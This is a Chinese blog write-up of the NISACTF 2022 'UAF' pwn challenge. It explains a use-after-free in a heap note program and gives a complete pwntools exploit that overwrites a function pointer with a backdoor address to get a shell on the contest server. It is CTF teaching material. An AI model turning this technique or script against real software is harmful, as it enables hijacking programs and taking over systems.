【PWN · UAF】[NISACTF 2022]UAF

已于 2024-02-26 20:21:21 修改
阅读量601 收藏 2
点赞数 5
分类专栏: 【PWN · Heap】 文章标签: UAF CTF PWN
于 2023-07-22 16:26:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/131868988
版权

第一道Heap题目!!第一道UAF!!

前言

作为本萌新做的第一道堆题,接触到新的领域,总是又能够学到很多东西。

本题用到了堆漏洞UAF:use after free。 

一、关键代码

通过checksec、file基本了解信息后,拖入IDA进行反汇编。有几个重要的部分需要强调如下:

后门函数

UAF漏洞存在
函数指针调用函数

二、GPT解读代码

本萌新才疏学浅,不如GPT

假设有以下定义:

void (__cdecl *page)(char *);

这是一个函数指针,指向一个返回类型为void、参数为char*的函数。

现在看一下代码行:

(*((void (__cdecl **)(char *))page + 1))(page);
  1. ((void (__cdecl **)(char *))page + 1) 这部分的目的是将函数指针page转换为一个指向函数指针的指针,并将其增加1。实际上,它将page视为一个指针数组,然后偏移了一个位置。
  2. (*((void (__cdecl **)(char *))page + 1)) 接下来,我们取得偏移后的指针(page的指针数组的第二个元素),并使用解引用操作符``获取该指针所指向的内容,即该指针指向的函数指针。
  3. (page) 最后,我们将page作为参数传递给获取到的函数指针,并调用它。

换句话说,这行代码的作用是调用page指向的函数指针数组中的第二个函数指针,并将page本身作为参数传递给该函数。

而看到可构造后门函数NICO,我们可作如下尝试:①argu=addr('/bin/sh')  ②func=NICO

三、payload构造原理

注意到page是一个数组,类型为 char *,在32位的机子里,这意味着一个page数组的单元,存储地址,有着4byte的空间。所以page+1将越过4个字节。这为我们构造特定的payload提供了依据。

page&(page[0])page+1&(page[1]) ,func在page[0]向后偏移4byte处,所以argu不能太长,必须小于4byte。

总而言之,如下构造:(’/bin/sh0x00’但是太长了,换成‘sh\x00\x00’,共4byte)+(NICO_addr,共4byte)

四、UAF利用

值得注意的是,在create、edit、del、show函数中(关键是edit和show),对于page页号有着不同的“过滤”

show:

edit:

这两者的不同,直接导致了page0的内容无法直接通过edit修改!而这正是我们要做的!

这就要利用UAF来绕过对page 0写的限制:在申请page 0后释放它,再申请page 1,此时获得的指针还是指向之前分配给page 0的空间。这时候我们通过新获得的指针修改page 0中的内容,在show的时候指明展示page 0,即可调用通过payload篡改的地址,即后门函数,getshell!

五、EXP:(薛微丑陋,见谅)

#(*((void (__cdecl **)(char *))page + 1))(page);
#上述代码调用*(page+1)的函数func,参数argu为page,即func(argu)
#发现后门函数NICO,所以我们试着如下构造:
#argu=addr('/bin/sh')  func=NICO

from pwn import *
from pwn import p32

context(arch='i386',log_level='debug',os='linux')

backdoor=0x08048642
file=ELF('./pwn')
payload=b'sh\x00\x00'+p32(backdoor)

# io=process('./pwn')
io=remote('node4.anna.nssctf.cn',28234)
#create page 0
io.recvuntil(b':')
io.sendline(b'1')

#delete page 0
io.recvuntil(b':')
io.sendline(b'3')
io.recvuntil(b'page')
io.sendline(b'0')

#create page 1
io.recvuntil(b':')
io.sendline(b'1')

#edit page 1
io.recvuntil(b':')
io.sendline(b'2')
io.recvuntil(b'page')
io.sendline(b'1')
io.recvuntil(b'strings')
io.sendline(payload)

#show page 0
io.recvuntil(b':')
io.sendline(b'4')
io.recvuntil(b'page')
io.sendline(b'0')

io.interactive()

总结

UAF的第一题,Heap的第一题。heap一直都是pwn里的大头,好好学!加油!

Mr_Fmnwon
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
NISACTF 2022 writeup
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
2024NKCTF-pwn
03-25
2024NKCTF_pwn
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
[NISACTF 2022]bingdundun~
YangYubo091699的博客
10-16 2114
[NISACTF 2022]bingdundun~
[NISACTF 2022]UAF
红叶的博客
03-10 436
跟hacknote一样的做法,但是有所不同。
[NISACTF 2022]下
qq_62046696的博客
07-30 2330
打开界面看见这种,格式一般都是利用管道符然后进行叠注入或者报错注入试一下叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
[NISACTF 2022]上
qq_62046696的博客
07-26 3430
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
A pwn challenge in 2022 美团高校赛 .zip
11-09
美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案内容,可用于参赛学习、参考 美赛竞赛资源,竞赛解决方案,包含完整源码解决方案...
[NISACTF 2022]流量包里有个熊做题笔记及心得
2301_79424186的博客
03-19 284
这道题不难但是涉及的地方挺多的,根据SS猜到FF开头的JPG再想到rot13就体现了典型的MISC思想,虽然有更抽象的(
NSSCTF刷题笔记pwn6——[NISACTF 2022]ezstack
qq_45692883的博客
02-02 216
这个shell会使用system函数打印一串内容,并且发现我们读入的数据大于buf的大小,存在栈溢出。栈溢出,system函数,/bin/sh字符串,那么万事已经具备了,开始写脚本。按下shift+12,在字符串界面找到/bin/sh。用ida打开,有一个shell函数。
[NISACTF 2022]
snowlyzz的博客
09-09 5896
NISACTF部分WP
人工智能导论大学生期末复习测试题
06-07
人工智能导论大学生期末复习测试题
debugpy-1.6.7-cp38-cp38-macosx_10_15_x86_64.whl
06-07
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
wx_camera_1717740438095.jpg
06-07
wx_camera_1717740438095.jpg
widgetsnbextension-3.0.0a13-py2.py3-none-any.whl
最新发布
06-07
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
计算机二级考试简单试题
06-07
计算机二级考试是中国计算机技术职业资格(水平)考试中的一个级别,主要面向具备一定计算机应用能力的人员。考试内容通常包括理论知识和实践技能两个部分,旨在评估考生在计算机操作、编程、数据库管理等方面的综合能力。以下是对计算机二级考试的简介: - **考试目的**: 验证考生是否具备计算机应用的基本技能和一定的专业水平。 - **考试科目**: 考试科目多样,可能包括但不限于C语言程序设计、Java语言程序设计、数据库技术、办公软件应用、计算机网络基础等。 - **考试形式**: 包括笔试(理论知识测试)和上机考试(实践技能测试)。 - **考试题型**: 题型可能包括选择题、填空题、简答题、应用题和操作题等。 - **适用人群**: 适用于希望提升计算机应用能力的学生、职场人士以及对计算机技术感兴趣的自学者。 - **学习价值**: 通过考试可以系统学习计算机相关知识,提高个人计算机操作和编程能力。 - **考试准备**: 考生需要根据考试大纲进行复习,掌握必要的理论知识和实践技能。 - **考试认证**: 考试合格者将获得由考试机构颁发的计算机二级证书,证明其计算机应用能
uaf pwn hacknote
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应的指针设置为NULL。这就导致在之后的操作中,如果再次访问已释放的内存,就会发生UAF漏洞。 攻击者可以利用UAF漏洞来实现攻击,例如修改已经被释放的内存中的内容,控制程序的执行流程,实现任意代码执行、信息泄露等攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值